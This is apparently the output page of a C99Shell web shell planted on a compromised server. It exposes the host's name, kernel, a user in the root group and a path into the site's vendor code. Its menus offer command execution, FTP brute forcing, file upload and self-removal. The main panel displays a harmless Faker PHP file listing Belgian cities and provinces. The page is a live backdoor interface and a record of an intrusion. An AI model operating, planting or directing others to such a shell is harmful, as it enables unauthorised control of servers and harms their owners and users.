!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/fakerphp/faker/src/Faker/Provider/fr_BE/   drwxr-xr-x
Free 29.26 GB of 117.98 GB (24.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Address.php (3.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Faker\Provider\fr_BE;

class 
Address extends \Faker\Provider\fr_FR\Address
{
    protected static 
$postcode = ['####'];

    protected static 
$streetAddressFormats = [
        
'{{streetName}} {{buildingNumber}}',
    ];

    protected static 
$streetNameFormats = ['{{streetSuffix}} {{lastName}}'];

    protected static 
$cityFormats = ['{{cityName}}'];

    protected static 
$addressFormats = [
        
"{{streetAddress}}\n {{postcode}} {{city}}",
    ];

    protected static 
$streetSuffix = [
        
'rue''avenue''boulevard''chemin''chaussée''impasse''place',
    ];

    
/**
     * Source: http://fr.wikipedia.org/wiki/Ville_de_Belgique
     *
     * @var array
     */
    
protected static $cityNames = [
        
'Aarschot''Alost''Andenne''Antoing''Anvers''Arlon''Ath''Audenarde''Bastogne''Beaumont''Beauraing''Beringen''Bilzen''Binche',
        
'Blankenberge''Bouillon''Braine-le-Comte''Bree''Bruges''Bruxelles''Charleroi''Châtelet''Chièvres''Chimay''Chiny''Ciney''Comines-Warneton''Courtrai',
        
'Couvin''Damme''Deinze''Diest''Dilsen-Stokkem''Dinant''Dixmude''Durbuy''Eeklo''Enghien''Eupen''Fleurus''Florenville''Fontaine-l\'Évêque''Fosses-la-Ville',
        
'Furnes''Gand''Geel''Gembloux''Genappe''Genk''Gistel''Grammont''Hal''Halen''Hamont-Achel''Hannut''Harelbeke''Hasselt',
        
'Herck-la-Ville''Herentals''Herstal''Herve''Hoogstraten''Houffalize''Huy''Izegem''Jodoigne''La Louvière''La Roche-en-Ardenne''Landen''Léau',
        
'Le Rœulx''Lessines''Leuze-en-Hainaut''Liège''Lierre''Limbourg''Lokeren''Lommel''Looz''Lo-Reninge''Louvain''Maaseik''Malines',
        
'Malmedy''Marche-en-Famenne''Menin''Messines''Mons''Montaigu-Zichem''Mortsel''Mouscron''Namur''Neufchâteau''Nieuport',
        
'Ninove''Nivelles''Ostende''Ottignies-Louvain-la-Neuve''Oudenburg''Peer''Péruwelz''Philippeville''Poperinge''Renaix''Rochefort''Roulers',
        
'Saint-Ghislain''Saint-Hubert''Saint-Nicolas''Saint-Trond''Saint-Vith''Seraing''Soignies''Stavelot''Termonde''Thuin',
        
'Tielt''Tirlemont''Tongres''Torhout''Tournai''Turnhout''Verviers''Vilvorde''Virton''Visé''Walcourt''Waregem''Waremme''Wavre''Wervik',
        
'Ypres''Zottegem',
    ];

    protected static 
$region = [
        
'Wallonie''Flandre''Bruxelles-Capitale',
    ];

    protected static 
$province = [
        
'Anvers''Limbourg''Flandre orientale''Brabant flamand''Flandre occidentale',
        
'Hainaut''Liège''Luxembourg''Namur''Brabant wallon',
    ];

    
/**
     * Randomly returns a belgian province.
     *
     * @example 'Hainaut'
     *
     * @return string
     */
    
public static function province()
    {
        return static::
randomElement(static::$province);
    }

    
/**
     * @see parent
     */
    
public function cityName()
    {
        return static::
randomElement(static::$cityNames);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--